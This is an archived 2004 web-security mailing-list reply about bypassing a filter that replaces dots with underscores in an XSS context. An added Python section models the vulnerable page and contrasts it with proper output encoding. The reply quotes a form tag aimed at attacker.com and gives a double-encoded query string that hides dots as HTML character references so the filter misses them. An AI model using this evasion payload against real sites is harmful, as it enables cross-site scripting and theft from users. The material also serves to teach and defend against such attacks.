WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: windo () windowlicker dyn ee
Date: Tue, 1 Jun 2004 09:03:04 +0300

Hey.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Of course I don't know how the substitution works, but double encoding like
this MIGHT work:

print.php?print=%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E

print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.

Siim
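
Added example, not part of the original message: a Python model of the behaviour described for print.php, showing why a character substitution applied after URL decoding misses HTML character references, next to context-appropriate output encoding. The function names and the assumption that the server URL-decodes exactly once are illustrative; the sample value is the query string from the message.

```python
import html
from urllib.parse import unquote

# Query value taken from the message above; %26%2346; URL-decodes to "&#46;".
SAMPLE = "%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E"


def naive_print(raw_value):
    """Assumed model of print.php: URL-decode once, swap '.' for '_', echo as HTML."""
    return unquote(raw_value).replace(".", "_")


def hardened_print(raw_value):
    """Echo the same input as inert text by HTML-encoding it for the output context."""
    return html.escape(unquote(raw_value), quote=True)


def browser_view(markup):
    """Approximate the HTML parser resolving character references in the response."""
    return html.unescape(markup)


def filter_bypassed(raw_value, blocked="."):
    """True when the blocked character is absent from the filtered output
    but reappears once the browser resolves character references."""
    out = naive_print(raw_value)
    return blocked not in out and blocked in browser_view(out)


if __name__ == "__main__":
    print("filtered output :", naive_print(SAMPLE))
    print("as parsed       :", browser_view(naive_print(SAMPLE)))
    print("filter bypassed :", filter_bypassed(SAMPLE))
    print("encoded output  :", hardened_print(SAMPLE))
```

The substitution never sees a literal '.', so it leaves the markup intact; encoding the output for the HTML context removes the markup itself, which makes the choice of characters to blacklist irrelevant.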

